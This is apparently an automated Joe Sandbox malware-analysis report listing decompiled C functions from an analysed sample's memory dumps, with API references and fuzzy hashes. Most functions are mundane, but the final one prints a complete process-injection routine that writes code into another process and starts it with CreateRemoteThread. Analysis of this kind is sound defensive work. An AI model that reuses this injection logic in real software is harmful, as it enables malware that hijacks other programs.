                          C-Code - Quality: 100%
			E006EAB10() {
				signed char _t2;
				int _t4;
				WCHAR* _t6;
				WCHAR* _t7;

				if( *0x6f9c04 == 0) { /* 0x006eab1e */
					_t6 = _t7; /* 0x006eab20 */
					E006F4520(_t6, 0x50); /* 0x006eab25 */
					_t2 = GetFileAttributesW(_t6); /* 0x006eab2e */ // executed
					if(_t2 == 0xffffffff) { /* 0x006eab37 */
						L4: /* 0x006eab44 */
						_t4 = CreateDirectoryW(_t6, 0); /* 0x006eab47 */ // executed
						return _t4;
					} /* 0x006eab47 */
					if((_t2 & 0x00000010) == 0) { /* 0x006eab3b */
						DeleteFileW(_t6); /* 0x006eab3e */
						goto L4;
					} /* 0x006eab3e */
				} /* 0x006eab3b */
				return _t2; /* 0x006eab54 */
			}

                          APIs
                          • GetFileAttributesW.KERNELBASE ref: 006EAB2E
                          • DeleteFileW.KERNEL32 ref: 006EAB3E
                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 006EAB47
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: File$AttributesCreateDeleteDirectory
                          • String ID:
                          • API String ID: 3749538849-0
                          • Opcode ID: 718f4e5c445ff75d989ff0a0f0f3bb3e754848c0b26f5781e07e24094815424f
                          • Instruction ID: 96bedeafb21210265acd2dea320b7326521b79e477afdd9f032aa9ef9ea40832
                          • Opcode Fuzzy Hash: 718f4e5c445ff75d989ff0a0f0f3bb3e754848c0b26f5781e07e24094815424f
                          • Instruction Fuzzy Hash: 57E08630443A64A7E7202328BC0AFEA3A174F12326F001310F525552D1EF18159B86EB
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
			E006F3F50(intOrPtr _a4) {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr _t8;

				_t8 = _a4; /* 0x006f3f54 */
				_t7 =  *0x6f9d54; /* 0x006f3f58 */
				_t5 =  *0x6f9d9c; /* 0x006f3f5e */
				L1: /* 0x006f3f6a */
				 *_t7(0x6f9bbc); /* 0x006f3f6f */
				_t6 =  *0x6f9a94; /* 0x006f3f71 */ // 0x2fd120
				if( *_t6 != 0) { /* 0x006f3f7a */
					E006F1A70(_t6, _t8); /* 0x006f3f7d */
				} /* 0x006f3f7d */
				 *_t5(0x6f9bbc); /* 0x006f3f87 */
				Sleep(0xbb8); /* 0x006f3f8e */ // executed
				goto L1;
			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F3F6F
                          • RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F3F87
                          • Sleep.KERNELBASE(00000BB8), ref: 006F3F8E
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeaveSleep
                          • String ID:
                          • API String ID: 1566154052-0
                          • Opcode ID: 1165d6182099d92479aea8336a49f07fe0f9d640d184ab1f6601173171981c5f
                          • Instruction ID: 28d6a664f900d18db41ccd4f47351660bf7317e60980e239ba2f1b918e0f5ea9
                          • Opcode Fuzzy Hash: 1165d6182099d92479aea8336a49f07fe0f9d640d184ab1f6601173171981c5f
                          • Instruction Fuzzy Hash: E0E0EC3110562CABD700EB6AED85F7673BBEF86784F111049E600533A047A16D01CA76
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 34%
			E006E2DA0() {
				void* _t3;
				void* _t6;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t13;
				void* _t14;

				if( *0x6f9bb8 != 0) { /* 0x006e2daf */
					L2: /* 0x006e2dcd */
					if((GetVersion() & 0x000000fe) > 5) { /* 0x006e2ddb */
						_push(0x6f9aa8); /* 0x006e2df2 */
						_push(0x6f9b30); /* 0x006e2df7 */
						_push(1); /* 0x006e2dfc */
						_push(0); /* 0x006e2dfe */
						_push(0x6f9c0c); /* 0x006e2e00 */ // executed
					} else { /* 0x006e2ddd */
						_push(0x6f9bf4); /* 0x006e2ddd */
						_push(0x6f9bd8); /* 0x006e2de2 */
						_push(1); /* 0x006e2de7 */
						_push(0); /* 0x006e2de9 */
						_push(0x6f9afc); /* 0x006e2deb */
					} /* 0x006e2deb */
					_t3 =  *0x6f9df0(); /* 0x006e2e05 */ // executed
					_t13 = _t3; /* 0x006e2e0b */
					if(_t3 < 0) { /* 0x006e2e0f */
						_t12 = _t14; /* 0x006e2e18 */
						E006F4520(_t14, 0x30); /* 0x006e2e1d */
						E006F68E0( *0x6f9bb8, 0x200, _t12, _t13); /* 0x006e2e32 */
						_t6 = 0; /* 0x006e2e3a */
						_t10 = 0xffffffffffffffff; /* 0x006e2e3e */
					} else { /* 0x006e2e11 */
						_t10 = 1; /* 0x006e2e13 */
						_t6 = 1; /* 0x006e2e14 */
					} /* 0x006e2e14 */
					 *0x6f9bf8 = _t10; /* 0x006e2e3f */
					return _t6;
				} /* 0x006e2e3f */
				_t7 = E006E3180(0x400, 0); /* 0x006e2db8 */
				_t14 = _t14 + 8; /* 0x006e2dbd */
				 *0x6f9bb8 = _t7; /* 0x006e2dc2 */
				if(_t7 == 0) { /* 0x006e2dc7 */
					return 0;
				} /* 0x006e2e4e */
				goto L2;
			}

                          APIs
                          • GetVersion.KERNEL32 ref: 006E2DCD
                          • CoCreateInstance.OLE32(006F9C0C,00000000,00000001,006F9B30,006F9AA8), ref: 006E2E05
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                            • Part of subcall function 006F68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 006F6A15
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Heap$AllocateByteCharCreateInstanceMultiProcessVersionWide
                          • String ID:
                          • API String ID: 2686302260-0
                          • Opcode ID: 5e825f7a167cca5b756b4a580840fd43f7c9290974903563d66f278bd2b9187e
                          • Instruction ID: 582e30cf9ef057164675ef112b843b55a0b6dad8922aaaee6236ad0e40084e4b
                          • Opcode Fuzzy Hash: 5e825f7a167cca5b756b4a580840fd43f7c9290974903563d66f278bd2b9187e
                          • Instruction Fuzzy Hash: DA01DF3179136677E7682626BC9BFB7346B8B10B4AF250029F712E52E1E9908042C1B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
			E006F2E00(void* _a4, void* _a8, long _a12) {
				char _v16;
				void _v18;
				void* _t10;
				int _t12;
				int _t14;
				signed int _t15;
				long _t17;
				DWORD* _t18;
				void* _t19;

				_t10 = _a8; /* 0x006f2e06 */
				_t15 = 0; /* 0x006f2e0a */
				if(_t10 == 0) { /* 0x006f2e0e */
					L8: /* 0x006f2e64 */
					return _t15; /* 0x006f2e6c */
				} /* 0x006f2e6c */
				_t17 = _a12; /* 0x006f2e10 */
				_v18 = 0xa0d; /* 0x006f2e14 */
				if(_t17 != 0) { /* 0x006f2e1d */
					L6: /* 0x006f2e34 */
					_t19 = _a4; /* 0x006f2e34 */
					_t18 =  &_v16; /* 0x006f2e38 */
					_t12 = WriteFile(_t19, _t10, _t17, _t18, 0); /* 0x006f2e42 */ // executed
					if(_t12 != 0) { /* 0x006f2e4a */
						_t14 = WriteFile(_t19,  &_v18, 2, _t18, 0); /* 0x006f2e57 */ // executed
						_t15 = 0 | _t14 != 0x00000000; /* 0x006f2e61 */
					} /* 0x006f2e61 */
					goto L8;
				} /* 0x006f2e4a */
				_t17 = 0; /* 0x006f2e1f */
				while( *((char*)(_t10 + _t17)) != 0) { /* 0x006f2e21 */
					_t17 = _t17 + 1; /* 0x006f2e27 */
					if(_t17 != 0x4000) { /* 0x006f2e2e */
						continue;
					}
					_t15 = 0; /* 0x006f2e30 */
					goto L8;
				} /* 0x006f2e30 */
				goto L6;
			}

                          APIs
                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 006F2E42
                          • WriteFile.KERNELBASE(?,00000A0D,00000002,?,00000000), ref: 006F2E57
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 4d6112152cf265851cbbf864cec24f318ce769dee83d6c5a8a3c86daa355d6cc
                          • Instruction ID: 7e3b53c13030c65758b227fd3373b70215dd2b9cb82ef0e2b2c7ab27ae3c7aed
                          • Opcode Fuzzy Hash: 4d6112152cf265851cbbf864cec24f318ce769dee83d6c5a8a3c86daa355d6cc
                          • Instruction Fuzzy Hash: 6EF081312153476FE7288AA19C99FBB3AADAF86701F10402CFB45D6190D6649C0DCB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CoInitializeEx.OLE32(00000000,00000000), ref: 006F2D95
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 006F2DAD
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Initialize$Security
                          • String ID:
                          • API String ID: 119290355-0
                          • Opcode ID: 1918dde7c9278efc6d70e32bc238cbc25ad8ba529b60749b9e1f72aa1ddecb8f
                          • Instruction ID: feaf0d9df77cfc66f972ba5d617bc71ff4944f7425e4362f4bf8e96dfa14c437
                          • Opcode Fuzzy Hash: 1918dde7c9278efc6d70e32bc238cbc25ad8ba529b60749b9e1f72aa1ddecb8f
                          • Instruction Fuzzy Hash: 4BD052B2B026313AF6202A742C1CFB3A90DDF01BA0B120321FE10E72C0E2208E4182F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 26%
                          			E006EB250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                          				char _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v52;
                          				char _v216;
                          				char _v220;
                          				char _v224;
                          				char _v228;
                          				char _v232;
                          				intOrPtr _v248;
                          				char _v264;
                          				intOrPtr _v268;
                          				intOrPtr _v272;
                          				intOrPtr _v280;
                          				intOrPtr _t26;
                          				intOrPtr _t29;
                          				char _t30;
                          				void* _t37;
                          				void* _t41;
                          				intOrPtr _t48;
                          				char _t52;
                          				char* _t56;
                          				intOrPtr* _t57;
                          				void* _t60;
                          
                          				_t57 =  &_v220;
                          				_t48 = _a16;
                          				_t52 = 0;
                          				 *_t57 = 0;
                          				_v228 = 0;
                          				_v224 = 0;
                          				_v220 = 0;
                          				_v232 = 0;
                          				if((GetVersion() & 0x000000fe) >= 6) {
                          					if( *0x6f9bf0 == 0) {
                          						L18:
                          						return _t52;
                          					}
                          					_t26 =  *0x6f9c30; // 0x308d10
                          					if(_t26 == 0) {
                          						goto L18;
                          					}
                          					_push(0x800d);
                          					_push( &_v224);
                          					_push( &_v228);
                          					_push(_a8);
                          					_push(_a4);
                          					if(E006EF800() == 0) {
                          						_t52 = 0;
                          						L12:
                          						_t29 =  *_t57;
                          						if(_t29 != 0) {
                          							 *0x6f9f04(_t29);
                          						}
                          						_t30 = _v232;
                          						if(_t30 != 0) {
                          							 *0x6f9efc(_t30, 0);
                          						}
                          						_t31 = _v228;
                          						if(_v228 != 0) {
                          							E006E91E0(_t31);
                          						}
                          						goto L18;
                          					}
                          					_t56 =  &_v216;
                          					E006F4520(_t56, 0x28);
                          					_t57 = _t57 + 8;
                          					_t52 = 0;
                          					_t37 =  *0x6f9f08( &_v232, _t56, 0, 0); // executed
                          					if(_t37 < 0) {
                          						goto L12;
                          					}
                          					E006F7C90( *0x6f9c30,  *0x6f9a9c);
                          					E006F4520(_t56, 0x29);
                          					_t60 = _t57 + 0x10;
                          					_t52 = 0;
                          					_t41 =  *0x6f9f00(_v248, 0, _t56, _t60,  *0x6f9c30,  *0x6f9a9c, 0);
                          					E006F7C90( *0x6f9c30,  *0x6f9a9c);
                          					_t57 = _t60 + 8;
                          					if(_t41 < 0) {
                          						goto L12;
                          					}
                          					if(_t48 != 0) {
                          						L10:
                          						 *0x6f9ef4(_v280, 0, _v272, _v268, _v32, _t48, 0); // executed
                          						_t52 = 0xbadbac;
                          						goto L12;
                          					}
                          					E006F4520(_t56, 0x2a);
                          					_t57 = _t57 + 8;
                          					_push(0);
                          					_push( &_v264);
                          					_push(4);
                          					_push( &_v28);
                          					_push(_t56);
                          					_push(_v280);
                          					if( *0x6f9ef8() < 0) {
                          						goto L12;
                          					}
                          					_t48 = _v52;
                          					goto L10;
                          				}
                          				_t52 = 1;
                          				goto L18;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 0a34f0371e69d016c073472f1af01145be73346e823e9cba9c59c7600be1118f
                          • Instruction ID: 530daa649add55ae17a96ed66ca0d65cd859e1a585f0c52575b2f6e598775c7e
                          • Opcode Fuzzy Hash: 0a34f0371e69d016c073472f1af01145be73346e823e9cba9c59c7600be1118f
                          • Instruction Fuzzy Hash: 8041B072605356AFD7209F61EC46F7BBBAEEF44744F00142AFA48C2160E7719814DBB2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006EC6D0(short* _a4) {
                          				struct _OBJDIR_INFORMATION _v12;
                          				short* _t8;
                          				long _t10;
                          				struct _EXCEPTION_RECORD _t12;
                          				UNICODE_STRING* _t14;
                          				struct _OBJDIR_INFORMATION _t15;
                          				HMODULE* _t16;
                          				short _t18;
                          
                          				_t16 =  &_v12;
                          				_t8 = _a4;
                          				 *_t16 = 0;
                          				_t12 = 0;
                          				if( *_t8 != 0) {
                          					do {
                          						_t18 =  *((short*)(_t8 + _t12 + 2));
                          						_t12 = _t12 + 2;
                          					} while (_t18 != 0);
                          				}
                          				_t14 =  &_v12;
                          				_t15 = 0;
                          				 *_t14 = _t12;
                          				 *((short*)(_t14 + 2)) = _t12 + 2;
                          				 *((intOrPtr*)(_t14 + 4)) = _t8;
                          				_t10 = LdrLoadDll(0, 0, _t14, _t16); // executed
                          				if(_t10 >= 0) {
                          					_t15 =  *_t16;
                          				}
                          				return _t15;
                          			}

                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?), ref: 006EC70B
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 0500e327e78335092646379dbc2ed27fb3d43ad0c253ab3e325a0bceda7e84e6
                          • Instruction ID: a1f587190c8e29a6cab4c8bd97d3dd2191830e02c7ad10f7152fdb515233b88a
                          • Opcode Fuzzy Hash: 0500e327e78335092646379dbc2ed27fb3d43ad0c253ab3e325a0bceda7e84e6
                          • Instruction Fuzzy Hash: 89F08C706012208BC324AF28E806AA7B7F8EF45720F06C54DE4888B250E7759889CBE2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.541788212.00671000.00000040.00000001.sdmp, Offset: 00671000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_671000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID: v
                          • API String ID: 0-1801730948
                          • Opcode ID: d3366b6ad397d8bc6a71c2148f8272326a51d15007729fa0a8038f12376e4e3e
                          • Instruction ID: 42d1a18bf3c090f398c019b3bd3c542596280add00143b98184c7376b9464d51
                          • Opcode Fuzzy Hash: d3366b6ad397d8bc6a71c2148f8272326a51d15007729fa0a8038f12376e4e3e
                          • Instruction Fuzzy Hash: 0F5114B6504245DFCB08DF28D8459EABBA5FF85320B14C69EE859CF242D730E982CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNELBASE(000003E8), ref: 006E5B3B
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: b9bc7914662039c20b9b1096c4869bbad6270f533c797a4298eda038e6076814
                          • Instruction ID: 46694503378d2b8e9aaeb13b9d5ec6f3deb31bfc2a795b3f0c39a1b9183dafff
                          • Opcode Fuzzy Hash: b9bc7914662039c20b9b1096c4869bbad6270f533c797a4298eda038e6076814
                          • Instruction Fuzzy Hash: 20312AB0600B41AFE7249F26DC59F77B7EEEF44745F14882DA58AD2290EA31E841CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000003.00000002.541788212.00671000.00000040.00000001.sdmp, Offset: 00671000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_671000_______.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
                          • Instruction ID: 934872282c042806c04a2fafbac6b478198cacce32688aba0a959f352f854aa9
                          • Opcode Fuzzy Hash: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
                          • Instruction Fuzzy Hash: C5418D75200249DFDB08CF28D8499AABBA5FF49320B20C659F959CF382D730E942CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 100%
                          			E006E1250(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
                          				intOrPtr _v108;
                          				intOrPtr _v112;
                          				void* _v114;
                          				char _v116;
                          				char _v316;
                          				void* _v320;
                          				intOrPtr _v412;
                          				intOrPtr _v416;
                          				intOrPtr _v420;
                          				void* _v428;
                          				void* _v432;
                          				void _v436;
                          				void* _v444;
                          				void* _v448;
                          				_Unknown_base(*)()* _v452;
                          				intOrPtr _v456;
                          				void* _v460;
                          				void* _t120;
                          				void* _t136;
                          				struct HINSTANCE__* _t142;
                          				void* _t163;
                          				void* _t165;
                          				void* _t167;
                          				intOrPtr _t173;
                          				long _t180;
                          				WCHAR* _t181;
                          				SIZE_T* _t187;
                          				void* _t197;
                          				SIZE_T* _t204;
                          				void* _t206;
                          				intOrPtr* _t207;
                          				void* _t211;
                          				SIZE_T* _t213;
                          
                          				_t206 = __ecx;
                          				_t197 = 0;
                          				E006F6610( &_v452, 0, 0x1b4);
                          				_t213 =  &(( &_v444)[3]);
                          				if( *((intOrPtr*)(_t206 + 0x7c)) != 0) {
                          					L35:
                          					return _t197;
                          				}
                          				 *(_t206 + 0x88) = CreateEventW(0, 0, 0, 0);
                          				 *(_t206 + 0x8c) = CreateEventW(0, 0, 0, 0);
                          				 *(_t206 + 0x90) = CreateEventW(0, 1, 1, 0);
                          				 *((intOrPtr*)(_t206 + 0x70)) = _a4;
                          				_v456 = _a8;
                          				 *((intOrPtr*)(_t206 + 0x74)) = _a8;
                          				if(DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x88), _a4,  &_v436, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x8c), _a4,  &_v432, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x90), _a4,  &_v428, 0, 0, 2) == 0) {
                          					L23:
                          					_t197 = _v444;
                          					if(_t197 == 0) {
                          						CloseHandle( *(_t206 + 0x88));
                          						CloseHandle( *(_t206 + 0x8c));
                          						CloseHandle( *(_t206 + 0x90));
                          						if(_v436 != 0) {
                          							DuplicateHandle(_a4, _v436, GetCurrentProcess(), 0, 0, 0, 3);
                          						}
                          						if(_v432 != 0) {
                          							DuplicateHandle(_a4, _v432, GetCurrentProcess(), 0, 0, 0, 3);
                          						}
                          						if( *(_t206 + 0x90) != 0) {
                          							DuplicateHandle(_a4, _v428, GetCurrentProcess(), 0, 0, 0, 3);
                          						}
                          						if(_v452 != 0) {
                          							VirtualFreeEx(_a4, _v452, E006EA3A0(), 0x8000);
                          						}
                          						_t120 = _v448;
                          						_t207 = _t206 + 0x88;
                          						if(_t120 != 0) {
                          							VirtualFreeEx(_a4, _t120, 0x70, 0x8000);
                          						}
                          						 *((intOrPtr*)(_t207 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t207 + 0xc)) = 0;
                          						 *((intOrPtr*)(_t207 + 8)) = 0;
                          						 *((intOrPtr*)(_t207 + 4)) = 0;
                          						 *_t207 = 0;
                          						_t197 = _v444;
                          					}
                          					goto L35;
                          				} else {
                          					_t136 = VirtualAllocEx(_a4, 0, E006EA3A0(), 0x3000, 0x40);
                          					_v452 = _t136;
                          					if(_t136 == 0) {
                          						goto L23;
                          					}
                          					_t180 = E006EA3A0();
                          					_t187 = _t213;
                          					 *_t187 = 0;
                          					if(WriteProcessMemory(_a4, _v452, E006EA290, _t180, _t187) == 0 || _v460 != _t180) {
                          						goto L23;
                          					} else {
                          						_t181 =  &_v316;
                          						 *((intOrPtr*)(_t181 - 0x4c)) = 0;
                          						 *((intOrPtr*)(_t181 - 0x48)) = 0;
                          						 *((intOrPtr*)(_t181 - 0x24)) = 0;
                          						E006F4520(_t181, 0x56);
                          						_t142 = GetModuleHandleW(_t181);
                          						_t211 =  &_v116;
                          						 *(_t181 - 8) = _t142;
                          						E006F7160(_t211, 0x6e);
                          						 *((intOrPtr*)(_t181 - 0x6c)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x6f);
                          						 *((intOrPtr*)(_t181 - 0x68)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x70);
                          						 *((intOrPtr*)(_t181 - 0x64)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x71);
                          						 *((intOrPtr*)(_t181 - 0x60)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x72);
                          						 *((intOrPtr*)(_t181 - 0x5c)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x73);
                          						 *((intOrPtr*)(_t181 - 0x50)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x74);
                          						 *((intOrPtr*)(_t181 - 0x58)) = GetProcAddress( *(_t181 - 8), _t211);
                          						E006F7160(_t211, 0x75);
                          						 *((intOrPtr*)(_t181 - 0x54)) = GetProcAddress( *(_t181 - 8), _t211);
                          						_t204 =  &(_t213[0x12]);
                          						if( *((intOrPtr*)(_t181 - 0x6c)) == 0 || _v420 == 0 || _v416 == 0 || _v412 == 0) {
                          							goto L23;
                          						} else {
                          							_t163 = VirtualAllocEx(_a4, 0, 0x70, 0x3000, 0x40);
                          							_v448 = _t163;
                          							if(_t163 == 0) {
                          								goto L23;
                          							}
                          							_v460 = 0;
                          							if(WriteProcessMemory(_a4, _t163,  &_v436, 0x70, _t204) == 0 || _v460 != 0x70) {
                          								goto L23;
                          							} else {
                          								_t165 = E006F1800(_a4);
                          								_v444 = _t165;
                          								if(_t165 == 0) {
                          									goto L23;
                          								}
                          								if( *((intOrPtr*)(_t206 + 0x78)) == 0) {
                          									_t167 = CreateRemoteThread(_a4, 0, 0, _v452, _v448, 4, 0);
                          									_v460 = _t167;
                          									if(_t167 == 0) {
                          										goto L23;
                          									}
                          									L20:
                          									ResetEvent( *(_t206 + 0x8c));
                          									ResetEvent( *(_t206 + 0x88));
                          									if(ResumeThread(_v460) != 0 && E006EB710(_t170, _t206) != 0) {
                          										 *((intOrPtr*)(_t206 + 0x94)) = _v452;
                          										_t173 = _v456;
                          										 *((intOrPtr*)(_t206 + 0x98)) = _t173;
                          										 *((intOrPtr*)(_t206 + 0x9c)) = _t173 +  ~E006EA290 + E006EA350;
                          										 *((intOrPtr*)(_t206 + 0x7c)) = 1;
                          										_v448 = 1;
                          									}
                          									goto L23;
                          								}
                          								_v320 = _t211;
                          								_v116 = 0x6858;
                          								_v112 = 0xe9500000;
                          								_v460 = 0;
                          								_v114 = _v448;
                          								_v108 = _v452 + 0xfffffff4 - _t165;
                          								if(WriteProcessMemory(_a4, _t165, _t211, 0xc, _t204) == 0 || _v460 != 0xc) {
                          									goto L23;
                          								} else {
                          									goto L20;
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E128D
                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E1299
                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 006E12A8
                          • GetCurrentProcess.KERNEL32 ref: 006E12D2
                          • DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 006E12E6
                          • GetCurrentProcess.KERNEL32 ref: 006E12FE
                          • DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 006E1312
                          • GetCurrentProcess.KERNEL32 ref: 006E132A
                          • DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 006E1340
                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 006E1364
                          • WriteProcessMemory.KERNEL32(?,?,006EA290,00000000), ref: 006E1398
                          • GetModuleHandleW.KERNEL32(?), ref: 006E13CD
                          • GetProcAddress.KERNEL32(?,?), ref: 006E13F2
                          • GetProcAddress.KERNEL32(?,?), ref: 006E1406
                          • GetProcAddress.KERNEL32(?,?), ref: 006E141A
                          • GetProcAddress.KERNEL32(?,?), ref: 006E142E
                          • GetProcAddress.KERNEL32(?,?), ref: 006E1442
                          • GetProcAddress.KERNEL32(?,?), ref: 006E1456
                          • GetProcAddress.KERNEL32(?,?), ref: 006E146A
                          • GetProcAddress.KERNEL32(?,?), ref: 006E147E
                          • VirtualAllocEx.KERNEL32(?,00000000,00000070,00003000,00000040), ref: 006E14C6
                          • WriteProcessMemory.KERNEL32(?,00000000,?,00000070), ref: 006E14EF
                            • Part of subcall function 006F1800: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 006F181C
                            • Part of subcall function 006F1800: ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 006F1842
                            • Part of subcall function 006F1800: ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 006F1869
                            • Part of subcall function 006F1800: ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 006F1893
                          • WriteProcessMemory.KERNEL32(?,00000000,?,0000000C), ref: 006E1570
                          • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,00000000), ref: 006E15A3
                          • ResetEvent.KERNEL32(?), ref: 006E15BD
                          • ResetEvent.KERNEL32(?), ref: 006E15C5
                          • ResumeThread.KERNEL32(?), ref: 006E15CB
                          • CloseHandle.KERNEL32(?), ref: 006E162A
